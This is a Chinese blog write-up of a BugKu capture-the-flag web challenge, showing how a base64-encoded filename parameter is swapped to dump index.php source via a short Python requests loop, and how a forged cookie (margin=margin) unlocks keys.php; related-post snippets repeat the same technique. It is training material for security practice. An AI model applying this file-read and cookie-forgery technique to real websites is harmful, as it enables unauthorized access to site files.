BugKu -- cookies欺骗

最新推荐文章于 2024-04-13 10:41:39 发布
最新推荐文章于 2024-04-13 10:41:39 发布
阅读量1.8w 收藏 13
点赞数 10
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26090065/article/details/81588595
版权

cookies欺骗

        100

http://120.24.86.145:8002/web11/
答案格式:KEY{xxxxxxxx}

 解题思路:

打开链接是一串没有意义的字符串,查看源码没有发现什么

观察url ,发现 a2V5cy50eHQ= 是一个base64编码,解码后是keys.txt

http://120.24.86.145:8002/web11/index.php?line=&filename=a2V5cy50eHQ=

 尝试用 filename访问index.php(原url使用base64,这也将index.php进行编码),line参数应该是行数,试一下 line=2

出现一行代码,试一下line=3显示了不同的代码

一个个试太麻烦,上脚本将index.php的源码读取出来

import requests
a=30
for i in range(a):
    url="http://120.24.86.145:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw" 
    s=requests.get(url)
    print s.text

最后读取出来的源码

<?php

error_reporting(0);

$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");

$line=isset($_GET['line'])?intval($_GET['line']):0;

if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(

'0' =>'keys.txt',

'1' =>'index.php',

);



if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){       //看这里

$file_list[2]='keys.php';

}



if(in_array($file, $file_list)){

$fa = file($file);

echo $fa[$line];

}

?>

分析源码,前面判断传参,后面判断cookie必须满足margin=margin才能访问keys.php,别忘了编码

执行后页面是空白的,emmm右键查看源码,flag出来啦

「已注销」
关注
  • 10
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
BugKucookies 欺骗
wssmiss的博客
03-25 1505
题目链接 http://123.206.87.240:8002/web11/ 查看源码后没有可用信息 观察url发现参数filename的值加密了 解密后filename=keys.txt 尝试用修改参数filename的值为index.php(注意此处要用base64加密为aW5kZXgucGhw) 发现参数line没有给值,随意赋值如3,出现 写脚本抓原代码,先试一下有多少行,100,50...
Bugku-web之cookies
weixin_42939822的博客
03-13 1548
一打开题目,发现一系列重复的字符串,受到“备份是个好习惯”题目的影响,不自觉地对这串字符串进行了各种解密,无果…… 此时思路堵塞,无意间看到url中的payload格式,对filename变量进行了base64解码,得到了keys.txt的结果。 想到可能存在php常见的文件包含问题,于是对filename变量进行了更改,变更为index.php的base64加密,同时猜测line变量表示源码的行数,先另line=3,进行尝试,喜得猜想结果。 于是编写脚本,对index.php的源码进行提取。
bugku——cookie欺骗
吃肉唐僧的博客
09-02 332
打开题目地址,一串不懂的重复的字符串 一眼就看出这个filename后面的是base64加密的字符,解密出来时keys.txt 后来访问keys.txt,发现还是这些重复的字符 后来试着将index.php也base64加密试下,而且变动line会有显示文件源码行数内容 写个脚本把他全部拿下来 前30行,代码如下 <?php error_reporting(0);...
linux 面试题全面总结(持续更新)_av101 三上,四年软件测试面试遇到的问题整理
最新发布
2303_79055586的博客
04-13 1224
统启动中占据举足轻重的作用,比如如下是我的系统中的内容:(2)/etc/profile: 此文件为系统的每个用户设置环境信息,当用户第一次登录时,该文件被执行. 并从/etc/profile.d目录的配置文件中搜集shell的设置。(3)/etc/bash.bashrc: 为每一个运行bash shell的用户执行此文件.当bash shell被打开时,该文件被读取。(4)~/.bash_profile: 每个用户都可使用该文件输入专用于自己使用的shell信息,当用户登录时,该文件仅仅执行一次!
[bugku web部分]wp
jiaqi0806的博客
02-25 334
打开后是该地址: 其中filename用base64解码后为keys.php 我们尝试讲其换成index.php的base64编码 将地址转换并改变line的值为2/3/4…时发现页面出现了一行一行的代码。我们可以写一个python脚本将所有代码提取出来(当然也可以一个一个试然后抄下来) import requests i=30 for i in range(i): url="h...
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
bugku-cookies
m0_62094846的博客
10-27 984
一串代码,试过各种解码方式,都没用 这串代码有点像base64,解码得到keys.txt,但代替代码后页面没有信息 那么这串代码可能是某种固定格式,尝试使用其他文件名代替,flag.php,index.php的base64代码依次尝试 但都没获得有用的信息 这时注意到有个line,查找一下 line表示当前文件的行数,后面什么数字都没有,显然无法出现文件 ...
Bugku----cookies欺骗writeup
a1004070060的博客
06-02 629
解题链接:http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 一、题目打开是一串毫无意义的字符串,抓包也发现不了任何有价值的信息 二、尝试把参数filename的值解码得到真实文件名为keys.txt。 三、根据line和filename两个参数猜测网页显示的可能是filename...
Bugku-cookie
qq_51979295的博客
09-09 293
时间:2023年9月9日 类型:Web cookie base64发现get传参给变量filename了一个base64加密数据,解码后为key.txt,将字符串“index.php”base64编码后传给filename变量,再改变line的值来遍历主页源码,编写简易脚本跑一下 得到源码 代码分析 页面读取是先用了base64 decode再访问的,同时还会检查该页面在不在访问列表中。所以我们要将要访问的页面进行base64编码之后再传参,同时要注意访问文件是否在访问列表中 当获取到cookie ma
bugku cookies
hintll的博客
06-17 1561
bugku cookies 又是一道花费比奖励还高的bugku web的题: 开环境后是一堆乱码 一开始猜测乱码是不是提示 但是后来想了一下,这是web的题又不是misc的题,所以应该不是编码 习惯性的看一下源码: 源码里也是什么都没有 f12看一下网络: 无意间看到了一个特殊的参数: http://114.67.246.176:12368/index.php?line=&filename=a2V5cy50eHQ= 后来仔细看,才发现这是URL a2V5cy50eHQ=像是一个base64的
react-native-cookies:React Native的Cookie管理器
02-04
安装yarn add react-native-cookies连结中自动(推荐) react-native link react-native-cookies手册如果自动链接不起作用,则可以按照以下说明手动链接此库:的iOS 在Xcode中打开您的项目,右键单击“ Libraries ,...
chrome-extension-cookies-sample
05-05
Chrome示例Cookie使用扩展该扩展程序演示了如何通过Chrome扩展程序从网站读取Cookie。 看似需要读取Cookie的一个用例正在执行从一个网站到另一个网站的XMLHttpRequest调用,例如,将数据从第二个网站显示到第一个...
rsepc-rails-cookies错误
02-16
rails new rspec-rails-cookies-bug --skip-action-mailer --skip-action-mailbox --skip-action-text --skip-active-record --skip-active-storage --skip-action-cable --skip-sprockets --skip-spring --skip-...
bower-angular-cookies:角饼干凉亭回购
05-22
包装好的角饼干此仓库用于在npm和bower上分发。... script src =" /bower_components/angular-cookies/angular-cookies.js " > </ script > 然后将ngCookies添加为您的应用程序的依赖项: angular . m
bugku----正则匹配,cookies
qq_44418229的博客
07-16 411
bugku---正则匹配的练习 bugku---cookies欺骗
BUGKU-WEB cookies
天泽岁月
03-12 1108
BUGKU-WEB cookie欺骗
Bugku-Web-Cookies欺骗
豆傻小饼干随记
01-18 294
题目描述 解题思路 由于题目已经提示题目是cookies欺骗了,那么这个题目跟cookie或多或少有关联 先打开主页,发现了地址栏的变化与一串无规律的字符串 使用base64解码这个字符串 # -*- coding: utf-8 -*- # --author:valecalida-- from base64 import b64decode origin_url = "http://114.67.246.176:18338/index.php?line=&filename=a2
you-get 携带cookies
05-26
是的,you-get 可以携带 cookies。你可以通过以下方式将 cookies 添加到 you-get 的命令中: ``` you-get --cookies "cookies.txt" URL ``` 其中,"cookies.txt" 是保存 cookies 的文件路径,URL 是你想要下载的视频链接。 你也可以在 cookies.txt 文件中手动添加 cookies,格式为每行一个 cookie,例如: ``` cookie1=value1 cookie2=value2 ``` 注意,你需要在 cookies.txt 文件中添加与目标网站相关的 cookies,否则可能无法成功下载视频。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值